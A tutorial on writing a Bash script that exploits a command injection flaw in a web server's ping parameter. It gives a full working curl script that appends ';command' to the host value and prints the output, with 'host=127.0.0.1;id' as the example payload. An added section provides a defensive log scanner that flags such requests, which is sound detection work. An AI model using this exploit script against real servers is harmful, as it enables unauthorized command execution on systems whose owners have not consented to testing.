Writing Your First Exploitation Script in Bash: A Step-by-Step Tutorial

Exploitation scripts are essential tools for penetration testers and red teamers to automate the process of identifying and exploiting vulnerabilities. Bash scripting provides a simple yet powerful way to create your first exploitation script, especially for web-based or network vulnerabilities. In this tutorial, you will learn how to write a basic exploitation script in Bash, helping you automate simple attacks and speed up your testing process.

What is an Exploitation Script?

An exploitation script automates the process of exploiting a vulnerability in a target system. This can include sending crafted payloads, triggering vulnerabilities, or automating manual attack steps. Bash scripts are often used for quick proof-of-concept exploits or to chain multiple commands.

Why Use Bash for Exploitation?

  • Simplicity: Easy to write and modify.
  • Availability: Bash is available on almost all Linux systems.
  • Integration: Easily combine with tools like curl, nc, and nmap.
  • Automation: Automate repetitive attack steps.

Prerequisites

  • Basic Bash scripting knowledge.
  • Tools installed: curl, nc (netcat).
  • Target system with a known vulnerability (for testing only, ethically!).

Step 1: Choose a Simple Vulnerability to Exploit

For this tutorial, we’ll create a simple script to exploit a vulnerable web server with a command injection vulnerability in a GET parameter.

Example vulnerable URL:

http://vulnerable.com/ping?host=127.0.0.1

The host parameter is vulnerable to command injection.


Step 2: Set Up Your Bash Script

Create a new script file and make it executable.

touch exploit.sh
chmod +x exploit.sh

Open the file in your text editor.


Step 3: Define Target and Payload

Start your script by accepting the target URL and command to execute as arguments.

#!/bin/bash

if [ $# -lt 2 ]; then
  echo "Usage: $0 <target_url> <command>"
  echo "Example: $0 http://vulnerable.com/ping?host=127.0.0.1 'id'"
  exit 1
fi

TARGET=$1
CMD=$2

Step 4: Craft the Exploit URL

Inject the command into the vulnerable parameter. Assuming host is vulnerable, we append ; to inject.

EXPLOIT_URL="${TARGET};${CMD}"

Example: If TARGET is http://vulnerable.com/ping?host=127.0.0.1, and CMD is id, the URL becomes:

http://vulnerable.com/ping?host=127.0.0.1;id

Step 5: Send the Exploit Request with curl

Use curl to send the request and capture the response.

echo "[*] Sending exploit to $EXPLOIT_URL"
RESPONSE=$(curl -s "$EXPLOIT_URL")

Step 6: Display the Output

Print the response to the console.

echo "[*] Server response:"
echo "$RESPONSE"

Full Exploitation Script Example

#!/bin/bash

if [ $# -lt 2 ]; then
  echo "Usage: $0 <target_url> <command>"
  echo "Example: $0 http://vulnerable.com/ping?host=127.0.0.1 'id'"
  exit 1
fi

TARGET=$1
CMD=$2
EXPLOIT_URL="${TARGET};${CMD}"

echo "[*] Sending exploit to $EXPLOIT_URL"
RESPONSE=$(curl -s "$EXPLOIT_URL")

echo "[*] Server response:"
echo "$RESPONSE"

Step 7: Run Your Exploit Script

Execute the script with the target URL and command to run.

./exploit.sh "http://vulnerable.com/ping?host=127.0.0.1" "id"

You should see the output of the id command from the vulnerable server if the exploit works.
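
From the defender's side, the request this script sends is easy to spot in the web server's access log, because a legitimate host value never contains anything but hostname or IP address characters. The following is an added example, not part of the original tutorial: it assumes a combined-format access log and the /ping endpoint with its host parameter from Step 1; the function names and log lines are constructed for illustration.

```bash
#!/bin/bash
# Added example (not from the tutorial): flag /ping requests whose host value
# is not a plain hostname or IP address. The combined access-log format and
# all sample lines are constructed assumptions.
export LC_ALL=C   # keep the A-Z / a-z ranges below ASCII-only

# Print the raw host= value from a request target like /ping?host=1.2.3.4&n=1
host_param() {
  local query pair
  case "$1" in *\?*) query="${1#*\?}" ;; *) return 1 ;; esac
  while [ -n "$query" ]; do            # walk '&'-separated pairs, no globbing
    pair="${query%%&*}"
    case "$pair" in host=*) printf '%s\n' "${pair#host=}"; return 0 ;; esac
    case "$query" in *\&*) query="${query#*&}" ;; *) query="" ;; esac
  done
  return 1
}

# Allow-list: letters, digits, '.', ':' and '-' only. Shell metacharacters,
# spaces and any percent-encoding fail, since a plain host never needs them.
is_plain_host() {
  case "$1" in
    ''|*[!A-Za-z0-9.:-]*) return 1 ;;
    *) return 0 ;;
  esac
}

# Read access-log lines on stdin; report the client and value for each
# /ping request whose host parameter fails the allow-list.
scan_log() {
  local ip ident user ts tz method target rest value
  while read -r ip ident user ts tz method target rest; do
    case "$target" in /ping\?*) ;; *) continue ;; esac
    value=$(host_param "$target") || continue
    is_plain_host "$value" || printf 'SUSPICIOUS %s host=%s\n' "$ip" "$value"
  done
}

sample_log() {   # constructed sample lines
  cat <<'EOF'
198.51.100.7 - - [01/Jan/2025:10:00:01 +0000] "GET /ping?host=127.0.0.1 HTTP/1.1" 200 180 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Jan/2025:10:00:05 +0000] "GET /ping?host=127.0.0.1;id HTTP/1.1" 200 212 "-" "curl/8.5.0"
198.51.100.7 - - [01/Jan/2025:10:00:12 +0000] "GET /ping?host=example.org&count=1 HTTP/1.1" 200 190 "-" "Mozilla/5.0"
EOF
}

sample_log | scan_log
```

The same allow-list check belongs in the server-side handler itself, applied before the host value is ever passed to a command.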


Important Notes and Ethical Reminder

  • Only test on systems you have explicit permission to test.
  • Modify the script to fit different vulnerabilities or injection points.
  • Always verify and sanitize inputs when writing exploitation tools to avoid unintended damage.

Conclusion

Writing your first exploitation script in Bash is a great way to automate simple attacks and learn about vulnerabilities. This example demonstrated exploiting a command injection vulnerability via URL parameters. You can extend this approach to other vulnerabilities and integrate more complex payloads.
